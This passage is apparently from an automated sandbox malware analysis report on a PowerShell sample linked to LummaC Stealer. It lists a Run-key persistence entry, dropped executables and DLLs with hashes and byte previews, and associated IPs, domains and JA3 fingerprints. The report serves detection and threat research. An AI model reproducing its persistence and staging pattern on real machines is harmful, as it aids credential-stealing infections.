                                                                                                                                                                                  • Number of executed functions: 19
                                                                                                                                                                                  • Number of non-executed functions: 82
                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                  • Found application associated with file extension: .ps1

                                                                                                                                                                                  Warnings

                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                  • Execution Graph export aborted for target msiexec.exe, PID 5544 because there are no executed function
                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 4144 because it is empty
                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                  • VT rate limit hit for: bUAmCazc.ps1

                                                                                                                                                                                  Simulations

                                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                  09:45:10API Interceptor44x Sleep call for process: powershell.exe modified
                                                                                                                                                                                  09:45:24API Interceptor2x Sleep call for process: Setup.exe modified
                                                                                                                                                                                  09:45:52API Interceptor9x Sleep call for process: msiexec.exe modified
                                                                                                                                                                                  14:45:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe
                                                                                                                                                                                  14:45:38AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe

                                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                                  IPs

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  104.26.2.16zkGOUJOnmc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • arc-gym.com.cutestat.com/wordpress/wp-login.php
                                                                                                                                                                                  172.67.170.85vc9dXDjnki.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                    Domains

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                    rentry.coIaslcsMo.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    • 172.67.75.40
                                                                                                                                                                                    IaslcsMo.txt.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    • 172.67.75.40
                                                                                                                                                                                    owuP726k3d.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                    • 172.67.75.40
                                                                                                                                                                                    gkzHdqfg.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    • 172.67.75.40
                                                                                                                                                                                    xaSPJNbl.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                    • 172.67.75.40
                                                                                                                                                                                    Exploit Detector.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 172.67.75.40
                                                                                                                                                                                    MilwaukeeRivers.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    • 172.67.75.40
                                                                                                                                                                                    http://www.thearchiterra.gr/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 104.26.2.16
                                                                                                                                                                                    RobCheat.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                                                                                                                                                    • 172.67.75.40
                                                                                                                                                                                    Spedizione.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 172.67.75.40

                                                                                                                                                                                    ASNs

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                    CLOUDFLARENETUShttp://myhobbybuys.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                    https://29112024red01kamcjduq.z33.web.core.windows.netGet hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                    http://antena1.rtp.ptGet hashmaliciousRATDispenserBrowse
                                                                                                                                                                                    • 104.22.62.150
                                                                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    • 172.67.165.166
                                                                                                                                                                                    https://herald-review.com/users/logout-success/?expire=1626371676&referer_url=http://209.159.152.50Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                    https://michaelschwab.powerappsportals.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 104.18.3.157
                                                                                                                                                                                    BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                    • 172.67.186.192
                                                                                                                                                                                    'Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    • 104.21.58.9
                                                                                                                                                                                    Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    • 172.67.214.52
                                                                                                                                                                                    !SET__UP.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    • 172.67.187.171
                                                                                                                                                                                    CLOUDFLARENETUShttp://myhobbybuys.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                    https://29112024red01kamcjduq.z33.web.core.windows.netGet hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                    http://antena1.rtp.ptGet hashmaliciousRATDispenserBrowse
                                                                                                                                                                                    • 104.22.62.150
                                                                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    • 172.67.165.166
                                                                                                                                                                                    https://herald-review.com/users/logout-success/?expire=1626371676&referer_url=http://209.159.152.50Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                    https://michaelschwab.powerappsportals.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 104.18.3.157
                                                                                                                                                                                    BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                    • 172.67.186.192
                                                                                                                                                                                    'Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    • 104.21.58.9
                                                                                                                                                                                    Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    • 172.67.214.52
                                                                                                                                                                                    !SET__UP.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    • 172.67.187.171

                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                    a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    • 172.67.170.85
                                                                                                                                                                                    • 104.26.2.16
                                                                                                                                                                                    'Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    • 172.67.170.85
                                                                                                                                                                                    • 104.26.2.16
                                                                                                                                                                                    Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    • 172.67.170.85
                                                                                                                                                                                    • 104.26.2.16
                                                                                                                                                                                    !SET__UP.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    • 172.67.170.85
                                                                                                                                                                                    • 104.26.2.16
                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, NymaimBrowse
                                                                                                                                                                                    • 172.67.170.85
                                                                                                                                                                                    • 104.26.2.16
                                                                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    • 172.67.170.85
                                                                                                                                                                                    • 104.26.2.16
                                                                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    • 172.67.170.85
                                                                                                                                                                                    • 104.26.2.16
                                                                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    • 172.67.170.85
                                                                                                                                                                                    • 104.26.2.16
                                                                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    • 172.67.170.85
                                                                                                                                                                                    • 104.26.2.16
                                                                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    • 172.67.170.85
                                                                                                                                                                                    • 104.26.2.16

                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCVMrdORGbI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                      CVMrdORGbI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        Setup.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    1st-baba.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                      Nehogyelinditsd.ps1Get hashmaliciousLummaC StealerBrowse

                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                                                        Entropy (8bit):0.6599547231656377
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:NlllulRlltl:NllU
                                                                                                                                                                                                        MD5:2AAC5546A51052C82C51A111418615EB
                                                                                                                                                                                                        SHA1:14CFBEF3B3D238893C68F1BD6FE985DACF1953F1
                                                                                                                                                                                                        SHA-256:DBBA7151765EDB3661C0B1AD08037C0BDDC43227D2F2E8DDAC33C4A1E7C4151F
                                                                                                                                                                                                        SHA-512:1273F4B0365E213134E7FBC3BE45CAC33CB32AB6CED85479905C702F0429A0491A5E9C878E5FEFFA05BB0D1AA7F704949D13DD1DA9FCEB93665F1CC110FB24B8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:@...e...........................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\96473fc6

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1331047
                                                                                                                                                                                                        Entropy (8bit):7.4828218306346646
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24576:FMf3uhVRb0kcgNfq2wYoNmHdB65dAv7CE/GCUSqW:FMf3u3cciNmHdB6fAjCEmW
                                                                                                                                                                                                        MD5:01B1592D2B3788C2F82D8BF4C3DD5F65
                                                                                                                                                                                                        SHA1:E66B52FF0B3EE73D44F38BAD591FBAEAAF154691
                                                                                                                                                                                                        SHA-256:3E0A43E07A0914EFD7384FA05381931979F1D384F797A6CAE4936F8C08A69FEB
                                                                                                                                                                                                        SHA-512:35B09B9082744376B178AF9A91DB6DAFD8B8220C73D808EDD99B5D76AA9DC6C8A5A9176C07E6D678A6CC5ACA12D950A348675E3FA78400C26DEA11E031DD68A8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:..i)..i)..i)..i)..i)/.i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..h)..9yO.=h..$@h..Zd..u\..Md..uX..[..$Le.5yy..[j..uX..[...)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)H. Gb..Hg..LN.i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)H.*[n..LB..]j..L..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i).. gO.;.W..Jy..Fm.GgN.5oy..L|..B..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)}.G.%.Y.9.i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\B03VAGDV27AOWCK1I.ps1

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (8793), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8793
                                                                                                                                                                                                        Entropy (8bit):6.157330885734901
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:PN2x2BjQrUP+/VKg8I+m1FcIavC4KEkfK64FT+hGNyrN:AxWQIP+/VKg8jokvlKEkfz4l+oQN
                                                                                                                                                                                                        MD5:4F96C867367E7A0BE82A59D2E920FEC4
                                                                                                                                                                                                        SHA1:73EB107607EB2D37979400F112BDD144CFD227DC
                                                                                                                                                                                                        SHA-256:6A3C8F51998C6D5379FD3F0A05E76C43E88B8729FBEC9460645944B841750EF1
                                                                                                                                                                                                        SHA-512:A9C33174A19A094AB76990288F52B7DB8B14FFF3202F38A5BC4ACEAF9619A5172D2DC809BFD29E0A79FF7C64F945A4C31ABF22E066AC0E087E6A1AA6497015BE
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Preview:<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><style>*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131;font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;height:100vh;min-height:100vh}.main-content{margin:8rem auto;max-width:60rem;padding-left:1.5rem}@media (width <= 720px){.main-content{margin-top:4rem}}.h2{font-size:1.5rem;font-weight:500;line-height:2.25rem}@media (width <= 720px){.h2{font-size:1.25rem;line-height:1.5rem}}#challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0i

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bd4sbbk3.hd2.ps1

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ee5zbho2.3sq.psm1

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kdxxub2a.khd.ps1

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tmfxg3z1.x0x.ps1

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vsauldan.oe0.psm1

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y4lbmmbe.bjd.psm1

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\eqoamnqfg

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\more.com
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):306688
                                                                                                                                                                                                        Entropy (8bit):6.836190455688662
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:sNGk2wuw1nYaH1SeaRt56699NInzNwsGg2AGf0jx:sck2w/9oeyzJ9NInzysGg2AGf0jx
                                                                                                                                                                                                        MD5:8A48C078589AC23005253B28416CBDED
                                                                                                                                                                                                        SHA1:582E4F5930F935D04A6D0C5DDCFBFFBFEA745B84
                                                                                                                                                                                                        SHA-256:A327EAFC8441768C377971350A15B895D289F8D780593B1FF4BEF217A9822FE6
                                                                                                                                                                                                        SHA-512:3BDC14145EC0C2D97CD3E502ADBF23CB71AE7B6FEE2608260985F9E2C4528E609D6E74795035B928FEB07968A44AA2383323DBCE7D40064A527EEA22937A1DAE
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....uS............................0.............@.......................................@..................................................................@...@..................................................4................................text... ........................... ..`.rdata... ......."..................@..@.data...|.... ...\..................@....CRT.........0.......^..............@..@.reloc...@...@...B...`..............@..Bpgo.................................@...........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe
                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):291968
                                                                                                                                                                                                        Entropy (8bit):6.618312525566491
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:PAHdwS/WYoTOLHIsPPzAdnz0YutYPDvhD:PCd9/WYoaLHF3z0z04PDvhD
                                                                                                                                                                                                        MD5:7FB44C5BCA4226D8AAB7398E836807A2
                                                                                                                                                                                                        SHA1:47128E4F8AFABFDE5037ED0FCABA8752C528FF52
                                                                                                                                                                                                        SHA-256:A64EAD73C06470BC5C84CFC231B0723D70D29FEC7D385A268BE2C590DC5EB1EF
                                                                                                                                                                                                        SHA-512:F0BD093F054C99BCC50DF4005D0190BD7E3DCEFEA7008AE4C9B67A29E832E02AE9FF39FA75BC1352C127AEB13AFDEA9BFDCC238AC826EF17F288D6FBD2EC8CAB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                        • Filename: CVMrdORGbI.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: CVMrdORGbI.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: 1st-baba.ps1, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: Nehogyelinditsd.ps1, Detection: malicious, Browse
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........GY8.&7k.&7k.&7k.M3j.&7k.M4j.&7k.M2j.&7k.^.k.&7k.^2j.&7k.^3j.&7k.^4j.&7k.M6j.&7k.&6k.&7k _3j.&7k _.k.&7k _5j.&7kRich.&7k........PE..d.....d.........."............................@.........................................`.................................................@...d...................L...(......h....w..T...........................@v..@...............P............................text...p........................... ..`.rdata..............................@..@.data....!..........................@....pdata..............................@..@_RDATA..\...........................@..@.rsrc..............................@..@.reloc..h............D..............@..B........................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Driver\msvcr90.dll

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):653952
                                                                                                                                                                                                        Entropy (8bit):6.885961951552677
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:5hr4UC+Ju/A0BI4yWkoGKJwZ9axKmhYTMAO7wFKjCUmRyyPe:9JfyZFGKJjxKmhSMAB6CUmRyyPe
                                                                                                                                                                                                        MD5:11D49148A302DE4104DED6A92B78B0ED
                                                                                                                                                                                                        SHA1:FD58A091B39ED52611ADE20A782EF58AC33012AF
                                                                                                                                                                                                        SHA-256:CEB0947D898BC2A55A50F092F5ED3F7BE64AC1CD4661022EEFD3EDD4029213B0
                                                                                                                                                                                                        SHA-512:FDC43B3EE38F7BEB2375C953A29DB8BCF66B73B78CCC04B147E26108F3B650C0A431B276853BB8E08167D34A8CC9C6B7918DAEF9EBC0A4833B1534C5AFAC75E4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................6.........!.R...7.....&.....0.....6.....3...Rich..........PE..L.....i[...........!.....\..........@-.......p....Rx.........................0......?T....@..............................|..P...(................................3......................................@............................................text...t[.......\.................. ..`.data....g...p...D...`..............@....rsrc...............................@..@.reloc...7.......8..................@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Driver\python27.dll

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):14191200
